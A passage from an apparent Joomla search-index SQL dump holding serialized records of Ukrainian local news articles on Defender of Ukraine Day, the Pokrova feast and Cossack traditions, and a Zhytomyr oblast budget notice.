";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"7\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:40:\"2480:14-zhovtnya-den-zakhisnika-ukrajini\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:62:\"/index.php/8-novini-2/2480-14-zhovtnya-den-zakhisnika-ukrajini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2480\";s:5:\"route\";s:93:\"index.php?option=com_content&view=article&id=2480:14-zhovtnya-den-zakhisnika-ukrajini&catid=8\";s:5:\"title\";s:60:\"14 жовтня - День захисника України\";s:11:\"description\";s:3523:\" 14 жовтня в Україні відзначається День захисника України, який нероздільно пов’язаний із розвитком українського війська та його військових традицій. Щорічне державне свято встановлено Указом Президента України № 806 від 14 жовтня 2014 року. У цей день українці поціновують воїнів, які в різні часи обороняли і обороняють нашу незалежність і територіальну цілісність, усіх захисників України незалежно від службового становища та статі. Це свято пов’язане з розвитком війська від часів Русі. Найкращі традиції захисників минулого успадкували бійці сучасних Збройних сил України, які сьогодні відстоюють суверенітет України у війні з російським агресором. Історія цього свята має давню традицію. Покрову Пресвятої Богородиці відзначали козаки, за що свято отримало другу назву – Козацька Покрова. Українське військо 1917–1921 років зберігало козацькі військові традиції в назвах військових частин, структурі, прапорах, одностроях тощо. 14 жовтня 1942 року вважається символічним днем утворення Української повстанської армії. З початком сучасної російсько-української війнимайже чотириста тисяч українців взяли зброю до рук у лавах Збройних Сил, Національної гвардії, правоохоронних органів і добровольчих формувань, щоб зупинити агресію Російської Федерації та відстояти незалежність України. Наразі Українська армія активно модернізується, позбувається радянської спадщини та відновлює українські військові традиції У День захисника України ми вшановуємо сучасних захисників України та героїв різних епох нашої історії. Це день, коли необхідно згадати загиблих вояків і подякувати всім громадянам, які присвятили життя захисту Української держави. Звільнити українську територію від окупанта без збройної відсічі неможливо. Тож боєздатне військо і внутрішня консолідація суспільства на основі спільних цінностей та поваги до власної держави забезпечать захист і відновлення територіальної цілісності країни. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-14 05:46:50\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-14 05:46:50\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4721,'index.php?option=com_content&view=article&id=2479','index.php?option=com_content&view=article&id=2479:14-zhovtnya-svyato-pokrovi-presvyatoji-vladichitsi-nashoji-bogoroditsi-ta-prisnodivi-mariji&catid=8','14 жовтня – свято Покрови Пресвятої Владичиці нашої Богородиці та Приснодіви Марії',' За переказами, у 910 році Богородиця, осяяна небесним світлом й оточена ангелами та святими, з’явилася людям, які молилися у Влахернському храмі у Константинополі за визволення від ворогів, які оточили місто. Пресвята Діва Марія зі сльозами стала молити Бога за християн. Потім Божа Матір на знак того, що бере народ під свою опіку, покрила людей у храмі чесним своїм омофором (грецький омофор – наплічник, тобто довга широка тканина з хрестом, яку носять священники на богослужіннях). Пресвята Владичиця сяяла небесною славою, а покрив у руках її блищав «краще за промені сонячні». Цей дивовижний покрив і захистив місто. ','2020-10-14 21:16:53','3922c6b632c530917f9594ebb89613eb',1,1,1,'*','2020-10-14 05:35:23','0000-00-00 00:00:00','2020-10-14 05:35:23','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2479\";s:5:\"alias\";s:91:\"14-zhovtnya-svyato-pokrovi-presvyatoji-vladichitsi-nashoji-bogoroditsi-ta-prisnodivi-mariji\";s:7:\"summary\";s:1386:\"		<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/pokrova.jpg\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/pokrova.jpg\"></a></p><p>&nbsp;&nbsp;&nbsp;<span style=\"font-size: 15px;\">&nbsp;За переказами, у  910 році Богородиця, осяяна небесним світлом й оточена ангелами та святими,  з’явилася людям, які молилися у Влахернському храмі у Константинополі за  визволення від ворогів, які оточили місто. Пресвята Діва Марія зі сльозами  стала молити Бога за християн. Потім Божа Матір на знак того, що бере народ під  свою опіку, покрила людей у храмі чесним своїм омофором (грецький омофор –  наплічник, тобто довга широка тканина з хрестом, яку носять священники на  богослужіннях). Пресвята Владичиця сяяла небесною славою, а покрив у руках її  блищав «краще за промені сонячні». Цей дивовижний покрив і захистив місто.</span>&nbsp;\";s:4:\"body\";s:5266:\"</p><p> Свято Покрови  Божої Матері та ікона Покрови – символ невпинного заступництва Владичиці за рід  людський. Воно є одним із найвеличніших свят, тому на честь нього досить часто  освячують новозбудовані храми. Покров Пресвятої Діви – знак любові та участі,  які Матір Божа відчуває до людей. Його благодать незримо покриває й захищає  кожну людину, оберігаючи від гріха і допомагаючи у нелегкий час.</p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Цього дня часто  призначали весілля. Нерідко 14 жовтня випадає перший сніг, який асоціюється з  весільним покривалом або фатою. А ще цього дня прощалися з осінню і зустрічали  зиму, бо зазвичай на Покрову до обіду – осінь, а після обіду – зима.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Особливе  ставлення до Покрови було в українських козаків. Згідно з переказами та легендами  саме на Покрову вони вирушали на зимівлю по своїх хуторах та зимівниках. На  Січі залишалася тільки стала залога із січовиків, які нічого, крім власної  зброї, не мали, та інших козаків, що за різними причинами залишалися у своїх  куренях. А оскільки у ті часи основним календарем були церковні свята, то і  маємо козацьке свято на Покрову.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Українські козаки  вважали Богоматір своєю заступницею. Тому ікона Марії з омофором була у кожному  козацькому курені, а головна січова церква завжди була Покровською. З’явився  навіть особливий тип ікони – «Козацька Покрова», на якій зображували козаків та  їхніх старшин під розпростертим покровом Богородиці. У запорозьких козаків був  особливий культ Богородиці-Покрови як заступниці та захисниці від ворога.  Головна січова церква завжди називалась на честь Покрови, а її ікона була в  кожному козацькому курені. Зображували її й на хоругвах, під якими козаки  виступали у походи. Перед кожним походом навколішки ставали на молитву до  Пресвятої Богородиці «Під Твою милість прибігаємо». Після завершення походу –  незалежно від його успішності – козаки відправляли молебень на честь Божої  Матері.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;Саме на свято  Покрови Пресвятої Богородиці, 14 жовтня, на козацькій раді січовики щороку  обирали собі кошового отамана. За звичаєм, він мав двічі відмовитися від честі  очолити «шановане товариство». Погоджувався після третьої пропозиції, цим самим  підкреслюючи, що йде на це не з власної волі, а на прохання козаків.  Новообраний кошовий дякував своїм побратимам за честь їх очолювати й кланявся  на чотири боки.</span></p><p><span style=\"font-size: 15px;\">&nbsp;&nbsp;&nbsp;&nbsp;На Покрову  молилися за воїнів, які перебували у походах, захищаючи рідну землю, обирали  козацьких отаманів. До нас дійшли перекази про те, як після зруйнування  Запорозької Січі у 1775 році козаки, що пішли з рідних місць за Дунай, взяли із  собою як найбільшу цінність ікону Покрови Пресвятої Богородиці.</span></p><p><span style=\"font-size: 15px;\">Покрова вважається і датою створення Української повстанської  армії (УПА).</span></p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-14 18:16:53\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:2:\"12\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:96:\"2479:14-zhovtnya-svyato-pokrovi-presvyatoji-vladichitsi-nashoji-bogoroditsi-ta-prisnodivi-mariji\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:118:\"/index.php/8-novini-2/2479-14-zhovtnya-svyato-pokrovi-presvyatoji-vladichitsi-nashoji-bogoroditsi-ta-prisnodivi-mariji\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2479\";s:5:\"route\";s:149:\"index.php?option=com_content&view=article&id=2479:14-zhovtnya-svyato-pokrovi-presvyatoji-vladichitsi-nashoji-bogoroditsi-ta-prisnodivi-mariji&catid=8\";s:5:\"title\";s:152:\"14 жовтня – свято Покрови Пресвятої Владичиці нашої Богородиці та Приснодіви Марії\";s:11:\"description\";s:1134:\" За переказами, у 910 році Богородиця, осяяна небесним світлом й оточена ангелами та святими, з’явилася людям, які молилися у Влахернському храмі у Константинополі за визволення від ворогів, які оточили місто. Пресвята Діва Марія зі сльозами стала молити Бога за християн. Потім Божа Матір на знак того, що бере народ під свою опіку, покрила людей у храмі чесним своїм омофором (грецький омофор – наплічник, тобто довга широка тканина з хрестом, яку носять священники на богослужіннях). Пресвята Владичиця сяяла небесною славою, а покрив у руках її блищав «краще за промені сонячні». Цей дивовижний покрив і захистив місто. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-14 05:35:23\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-14 05:35:23\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4723,'index.php?option=com_content&view=article&id=2481','index.php?option=com_content&view=article&id=2481:vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-9-misyatsiv-2020-roku&catid=8','Виконання дохідної частини бюджетів міст, районів та ОТГ за 9 місяців 2020 року',' За даними Департаменту фінансів Житомирської ОДА ','2020-10-15 17:47:47','ba77d0dace484a8cb7a8ada1205b64e7',1,1,1,'*','2020-10-15 14:47:37','0000-00-00 00:00:00','2020-10-15 14:47:37','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2481\";s:5:\"alias\";s:86:\"vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-9-misyatsiv-2020-roku\";s:7:\"summary\";s:263:\"	<p>За даними Департаменту фінансів Житомирської ОДА<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/censor.jpg\"><img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-15 14:47:47\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:91:\"2481:vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-9-misyatsiv-2020-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:113:\"/index.php/8-novini-2/2481-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-9-misyatsiv-2020-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2481\";s:5:\"route\";s:144:\"index.php?option=com_content&view=article&id=2481:vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-9-misyatsiv-2020-roku&catid=8\";s:5:\"title\";s:140:\"Виконання дохідної частини бюджетів міст, районів та ОТГ за 9 місяців 2020 року\";s:11:\"description\";s:93:\" За даними Департаменту фінансів Житомирської ОДА \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-15 14:47:37\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-15 14:47:37\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4727,'index.php?option=com_content&view=article&id=2482','index.php?option=com_content&view=article&id=2482:orkestr-malin-korotka-istoriya-arkhivni-materiali&catid=134','Оркестр \"Малин\"- коротка історія ( архівні матеріали)',' ','2020-10-17 11:01:42','7da91d1fd9036c0f979fe9f823d9ea3d',1,1,1,'*','2020-10-17 07:55:07','0000-00-00 00:00:00','2020-10-17 07:55:07','0000-00-00 00:00:00',0,0,4,_binary 